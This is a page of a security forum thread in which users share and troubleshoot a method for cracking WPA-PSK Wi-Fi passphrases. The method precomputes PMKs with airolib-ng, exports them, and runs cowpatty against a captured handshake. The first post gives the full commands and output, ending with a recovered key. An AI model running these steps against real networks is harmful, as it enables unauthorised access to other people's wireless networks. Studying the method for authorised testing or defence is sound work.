Page 1 of 10 123 ... LastLast
Results 1 to 10 of 96

Thread: Airolib-ng and cowpatty

  1. #1
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default Airolib-ng and cowpatty

    it's not really a tut but some hints for help those who wants to speed up things when attacking wpa

    I assume you have a wpa handshake capture in cap format(airodump+deauth)

    we are working on a network with essid test

    i assume you already get airolib-ng(1.0 dev) and have initiated a database give it a large password file(mine is 172000+ passwd) and have precomputed it if you have add some essid

    the trick is to add essid in db, precompute key with airolib-ng and to export pmk for this essid

    airolib-ng DB2 stats(where DB2 is my database)
    statsThere are 2 ESSIDs and 172747 passwords in the database. 345494 out of 345494 possible combinations have been computed (100%).

    ESSID Priority Done
    Livebox-a5a3 64 100.0
    test 64 100.0

    hopefully i already get "test" as essid in my db, if not i add it to db and recompute table 172000 password=172000 pmk to generate for an essid (aprox 30 min)

    i now export it in cowpatty(genpmk) format
    (where DB2 is database, "test" the essid to export, testpmk the pmk output file)
    airolib-ng DB2 export cowpatty "test" testpmk
    exportExporting...
    Done.

    now we test the pmk against essid
    testpmk is the exported file from airolib-ng, "test" the essid, -v verbose -r ...wpa.cap the handshake capture
    cowpatty -d testpmk -s "test" -v -r /pentest/wireless/aircrack-ng/test/wpa.cap
    cowpatty 4.0 - WPA-PSK dictionary attack. <jwright@hasborg.com>

    Collected all necessary data to mount crack against WPA/PSK passphrase.
    Starting dictionary attack. Please be patient.
    key no. 10000: arrojadite
    key no. 20000: calligraphical
    key no. 30000: contestation
    key no. 40000: dislocatory
    key no. 50000: femineity
    key no. 60000: hemadromometer
    key no. 70000: interlimitation
    key no. 80000: marquisotte
    key no. 90000: nonannulment
    key no. 100000: pancreatotomy
    key no. 110000: pontificality
    key no. 120000: raspingly
    key no. 130000: semiflashproof
    key no. 140000: subdecuple
    key no. 150000: trancedly
    key no. 160000: unimportance
    key no. 170000: weightlessness

    The PSK is "biscotte".

    172747 passphrases tested in 2.71 seconds: 63642.26 passphrases/second

    yep you've done it....
    i like the conjonction of cowpatty+sql database of precomputed keys....really nice.....just need time(less and less....) and a HUGE password file....

    just a little exemple of what can be done with this nice tools.....
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  2. #2
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    You must have a fast processor Shaman...cause I got almost 500,000 passwords and this is my output after 18 minutes!!!>>>

    {-=Xploitz=-} ~ # airolib-ng testdb batch
    Computed 50000 PMK in 1067 seconds (46 PMK/s, 200000 in buffer).



    And in another tab.....


    {-=Xploitz=-} ~ # airolib-ng testdb stats
    statsThere are 1 ESSIDs and 472992 passwords in the database. 50000 out of 472992 possible combinations have been computed (10.571%).

    ESSID Priority Done
    Xploitz Network 64 10.57

    only 10%!!!!
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  3. #3
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    well you do need to precompute the all table

    when you precompute it you can win 3x times on verifying pmk.... but you need to have your table precompute......

    don't you remember prez thread on time memory....
    it was with a tl50 core2duo....(not a fast one....)

    2 go of ram(maybe that helps)
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  4. #4
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Yea..Im having some MAJOR issues with that thread, balding_parrot, and Funnyman as well. Take a look...we need major help with cowpatty.


    Code:
    http://forums.remote-exploit.org/showthread.php?p=36325#post36325
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  5. #5
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    So many problems with this as well...geesh. What steps did you take to make the databases? Cause I went to the aircrack-ng main site..and TRIED to follow their tutorial..but after I run the

    airolib-ng testdb batch
    Computed 4292 PMK in 102 seconds (42 PMK/s, 0 in buffer). No free ESSID found. Will try determining new ESSID in 5 minutes...

    I ^C to exit..and try your

    airolib-ng testdb stats
    statsThere are 2 ESSIDs and 2146 passwords in the database. 4292 out of 4292 possible combinations have been computed (100%).

    ESSID Priority Done
    64 100.0
    Xploitz 64 100.0

    Cool so far right??

    Now I do your airolib-ng testdb export cowpatty "Xploitz" testpmk

    exportThere is no such ESSID in the database or there are no PMKs for it.


    What gives???
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  6. #6
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Heres a complete list of EVERYTHING I did in order.....


    {-=Xploitz=-} ~ # airolib-ng testdb init

    Now I make a ssidlist.txt and put ONLY Xploitz inside it and save

    {-=Xploitz=-} ~ # airolib-ng testdb import ascii essid ssidlist.txt
    importReading...
    Writing...
    Done.
    {-=Xploitz=-} ~ # airolib-ng testdb import ascii passwd algae.txt
    importReading...
    Writing... read, 411 invalid lines ignored.
    Done.
    {-=Xploitz=-} ~ # airolib-ng testdb batch
    Computed 4292 PMK in 75 seconds (57 PMK/s, 0 in buffer). No free ESSID found. Will try determining new ESSID in 5 minutes...

    {-=Xploitz=-} ~ # airolib-ng testdb stats
    statsThere are 2 ESSIDs and 2146 passwords in the database. 4292 out of 4292 possible combinations have been computed (100%).

    Where in the hell is this 2nd essid?? I only have 1 in it, and its called Xploitz

    ESSID Priority Done
    64 100.0
    Xploitz 64 100.0

    {-=Xploitz=-} ~ # airolib-ng testdb export cowpatty "Xploitz" testpmk
    exportThere is no such ESSID in the database or there are no PMKs for it.

    So I tried it without the quotes......

    {-=Xploitz=-} ~ # airolib-ng testdb export cowpatty Xploitz testpmk
    exportThere is no such ESSID in the database or there are no PMKs for it.
    {-=Xploitz=-} ~ # WHAT GIVES????
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  7. #7
    Developer balding_parrot's Avatar
    Join Date
    May 2007
    Posts
    3,399

    Default

    I don't know about you, but it seems to me like there is some step missing, something that is assumed that we have previously done before even getting to these steps.
    I just cannot find what it is YET

  8. #8
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Quote Originally Posted by balding_parrot View Post
    I don't know about you, but it seems to me like there is some step missing, something that is assumed that we have previously done before even getting to these steps.
    I just cannot find what it is YET
    Geesh..you to balding_parrot?? First " Benefits of Time-Memory Trade-Off in coWPAtty" , by theprez98, gives us problems...now airolib-ng is jacking us around!!! Gesh,..doesn't anything work with this time management stuff?? C'mon Shaman, or anyone...please tell us what were missing.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  9. #9
    Developer balding_parrot's Avatar
    Join Date
    May 2007
    Posts
    3,399

    Default

    Quote Originally Posted by -=Xploitz=- View Post
    Geesh..you to balding_parrot?? First " Benefits of Time-Memory Trade-Off in coWPAtty" , by theprez98, gives us problems...now airolib-ng is jacking us around!!! Gesh,..doesn't anything work with this time management stuff?? C'mon Shaman, or anyone...please tell us what were missing.
    There must be a connection somewhere, something so obvious.......

    Not sure about it saving time..... It is certainly using up enough.....

    Just think when we do get it working, with the amount of time we have spent on it, it's going to tell us the key before we even ask for it

  10. #10
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    C'mon Shaman...what are all the steps you took from begenning to end? This damn airolib is driving me crazy!! I asked on the aircrack forums..and darkAudix said he was doing EXACTLY the same thing as me with the same dev or aircrack..and he got it to work..but mine won't!! So my other question for you Niko is...

    Could it be that balding_parrots sqlite module is at fault? Aircrack main site says You must be running version 3.3.17 or above ..and parrots is 3.4..please help us Shaman.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

Page 1 of 10 123 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •